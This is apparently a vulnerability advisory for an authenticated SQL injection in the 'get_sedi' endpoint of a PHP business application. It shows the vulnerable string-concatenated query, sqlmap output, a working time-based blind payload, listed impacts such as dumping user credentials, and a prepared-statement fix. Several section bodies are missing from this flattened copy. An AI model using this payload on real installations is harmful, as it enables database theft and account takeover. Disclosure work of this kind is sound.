case 'get_sedi':
$idanagrafica = get('idanagrafica');
$q = "SELECT id, CONCAT_WS( ' - ', nomesede, citta ) AS descrizione
FROM an_sedi
WHERE idanagrafica='".$idanagrafica."' ...";
$rs = $dbo->fetchArray($q);
[INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
Parameter: #1* (URI)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: idanagrafica=1' AND (SELECT 2572 FROM (SELECT(SLEEP(5)))oOnc)-- rhVF
back-end DBMS: MySQL >= 5.0.12
$idanagrafica = get('idanagrafica');
$q = "SELECT ... WHERE idanagrafica='".$idanagrafica."' ...";
$idanagrafica = get('idanagrafica');
$q = "SELECT ... WHERE idanagrafica=".prepare($idanagrafica)." ...";
Summary
A SQL Injection vulnerability exists in the
ajax_complete.phpendpoint when handling theget_sedioperation. An authenticated attacker can inject malicious SQL code through theidanagraficaparameter, leading to unauthorized database access.Proof of Concept
Vulnerable Code
File:
modules/anagrafiche/ajax/complete.php:28Data Flow
$_GET['idanagrafica']→get('idanagrafica')$dbo->fetchArray($q)executes the malicious queryExploit
Manual PoC (Time-based Blind SQLi):
SQLMap Exploitation:
SQLMap Output:
Impact
zz_userstable to gain admin accessSELECT ... INTO OUTFILEif file permissions allowAffected Versions
Remediation
Replace direct concatenation with prepared statements:
Before:
After:
References
Credit
Discovered by: Łukasz Rybak